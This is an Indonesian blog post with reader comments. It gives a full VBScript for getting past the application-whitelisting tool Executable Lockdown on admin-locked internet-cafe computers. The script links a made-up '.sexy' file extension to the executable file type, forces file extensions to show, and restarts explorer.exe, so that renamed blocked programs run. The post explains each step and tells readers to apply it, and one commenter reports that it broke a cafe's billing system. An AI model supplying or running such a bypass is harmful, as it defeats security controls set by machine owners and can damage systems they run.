Mengenai Cara memby pass proteksi Executable Lockdown :
Seorang teman bernama Takien memprotes di sini :
katanya dia sudah mencoba Tips di :
http://lovepassword.blogspot.com/2009/03/by-pass-proteksi-executable-lock-down.html
ternyata nggak bisa jalan.
Sebelumnya masih di tips yang sama beberapa rekan juga ngomong tips itu gak bisa jalan.
Berikut ini komentar beberapa rekan :
================================================================
di copas nya kemana om.....koq saya dah coba nga isa isa anti exe nya tetep ke blok nga bisa jalankan instal program
makasih sebelumnya
xooi | 04.26.09 - 8:46 am | #
=================================================================
la gimana kalau waktu itu regeditnya di disable juga????
hehehehe,,muup,msh culun,baru pnya com 2 bln :-D
polio | 05.20.09 - 2:56 am | #
==================================================================
semua trik yang ada di blog ini, juga link2 terkait yang ada dikomentar udah aku coba.
dan hasilnya
tara.........
GAK ADA YANG SUKSES 
takien | Homepage | 09.08.09 - 1:05 am | #
===================================================================
Setelah saya pikir2 dengan sepenuh jiwa dan raga, kayaknya memang ada sesuatu yang perlu ditambahkan. Soalnya gini yah : Secara konsep cara itu berhasil, sudah saya uji berhasil. Tetapi secara aplikatif memang bisa banyak masalah. Dalam kasus di warnet misalnya : kemungkinan besar ada kasus regedit diproteksi, file reg diproteksi, begitu juga folder options. Merename,mengganti ekstensi file saja bisa repot jika secara default ekstensi file tidak ditampilkan, sehingga mau ganti ekstensi repot . Mau diganti pake folder optiions mungkin juga terproteksi, begitu juga ekspor registry pake file reg gagal pula. Lengkaplah penderitaan awak kan ? Impor registry pake program sejenis regedit lha mana bisa, kan justru semua program selain yang terdaftar diblokir oleh exelockdown ini.
Lalu gimana dong solusinya ???
Solusinya yah pakailah script yang bisa melewati proteksi itu semua.
Dengan sedikit trial error ternyata script vbs berhasiil dengan sukses membajak registry file exe di registry windows :
OK, copy paste tulisan di bawah ini, lalu simpan dengan ekstensi vbs :
const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = "."
On error resume next
Tanya = MsgBox("By Pass Exelockdown dengan Registry Shell Spawning"& _
vbNewLine & "Reset Exelockdown?", 36,"Exelockdown Hacking - by Lovepassword")
If Tanya = 6 Then 'Bila dipilih YA
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer & "\root\default:StdRegProv")
objRegistry.CreateKey HKEY_CLASSES_ROOT, ".sexy"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy",,"exefile"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy","Content Type","application/x-msdownload"
objRegistry.CreateKey HKEY_CLASSES_ROOT, ".sexy\PersistentHandler"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy\PersistentHandler",,"{098f2470-bae0-11cd-b579-08002b30bfeb}"
objRegistry.CreateKey HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
objRegistry.SetDWORDValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt",0
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("SELECT * FROM Win32_Process WHERE Name = 'explorer.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject("Wscript.Shell")
objShell.Run "explorer.exe"
msgbox "Copi file exe, rename menjadi file sexy, lalu jalankan",vbInformation,"Exelockdown Hacking - by Lovepassword"
End If
Sedikit penjelasan yah :
Bagian PERTAMA :
Set objRegistry = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &strComputer & "\root\default:StdRegProv")
objRegistry.CreateKey HKEY_CLASSES_ROOT, ".sexy"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy",,"exefile"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy","Content Type","application/x-msdownload"
objRegistry.CreateKey HKEY_CLASSES_ROOT, ".sexy\PersistentHandler"
objRegistry.SetStringValue HKEY_CLASSES_ROOT,".sexy\PersistentHandler",,"{098f2470-bae0-11cd-b579-08002b30bfeb}"
ini bagian pembajakan isiregistry sehingga file sexy diperlakukan sama dengan file exe karena registry .sexy diarahkan ke exefile.
Bagian KEDUA : objRegistry.CreateKey HKEY_CURRENT_USER, "Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
objRegistry.SetDWORDValue HKEY_CURRENT_USER,"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced","HideFileExt",0ini tujuannya untuk memaksa agar ekstensi file ditampilkan biar mengganti ekstensinya mudah.
Bagian KETIGA :
Set objWMIService = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
Set colProcessList = objWMIService.ExecQuery _
("SELECT * FROM Win32_Process WHERE Name = 'explorer.exe'")
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject("Wscript.Shell")
objShell.Run "explorer.exe"
ini tujuannya untuk merefresh registry secara cepat, explorer.exe ditutup kemudian dibuka lagi. Dalam kasus di warnet kan tidak mungkin kita restart komputer soalnya hasilnya malah mencelat semua karena ditendang Deepfreeze, jadi sebisa mungkin registry di refresh tanpa restart.
OK, jalankan script vbs di atas, kemudian copy file exe yang ingin anda jalankan tetapi sedang dalam keadaan terproteksi, kemudian rename file copian tersebut menjadi file dengan ekstensi sexy.
File dengan ekstensi exe tidak bisa berjalan atau terblokir kecuali file yang didaftarkan oleh admin.
Sedangkan sembarang file berekstensi sexy bisa tetap berjalan dengan tanpa halangan. Rename saja file exe yang terblokir menjadi file sexy.
SALAM
==================================================================
Download Script tersebut
di SINI SALAM
Postingan
9 komentar:
gusse
mengatakan...
setelah extensi .vbs dijalankan lalu bagaimana bos ?
Saya belum jelas, please tutorial yang lebih jelas
gusse
mengatakan...
file yang akan saya instal tipenya exe sudah saya rename menjadi sexy tapi dijalankan kok masih belum bisa. masih terhalang oleh anti exe.
lovepassword
mengatakan...
@Teman-teman : Saya tidak membahas mengenai Faronic Anti Executable, yang saya bahas adalah software bernama Executable Lock Down. Itu software dari perusahaan yang berbeda.
Kalo masalah vbs, setelah vbs dijalankan ya direname saja file exe jadi .sexy lalu file dijalankan. Urutannya sembarang, kamu rename dulu baru script vbs dijalankan juga biasanya OK, tetapi intinya ini bukan pembahasan soal Faronic Anti exe. Nama software yang dibahas adalah executable lock down. Sudah tertulis di artikel kan? ...
Anonim
mengatakan...
cara balikin ke semula gimana gan??? email saya d ikkisenpai@yahoo.com tolong segera ya gan
jeffry
mengatakan...
cara balikin ke semula gimana gan??? email saya d ikkisenpai@yahoo.com tolong segera ya gan
saya nyoba d sever ini, e billing nya ikut error nih, biar kembali gmn caranya???? niat cuma buat buka exe launcher salah 1 game, tp... zzzzzzzzzzz malah kaya gini jd nya
lovepassword
mengatakan...
Oke, akan saya coba balas lewat email. Kepada rekan-rekan yang lain, sebelum melakukan percobaan-percobaan yang rawan mohon lakukan backup registry dulu ya ????
Anonim
mengatakan...
mohon email saya di rofik_killer@yahoo.com
ada hal/konsult penting mengenai ID & password.
trims sblumnya.
rofik.
Anonim
mengatakan...
bisa tlg yg untuk Faronic Anti exe, mas lovepassword.. mo donlot file *.iso pake torrent. tp warnet ga bisa install app torrent. trims..
Unknown
mengatakan...
tetep gk bisa mas payahhhh
Posting Komentar
Terimakasih telah Berkunjung ....Ditunggu Komentarnya Lho....Silahken Silahken.... ^_^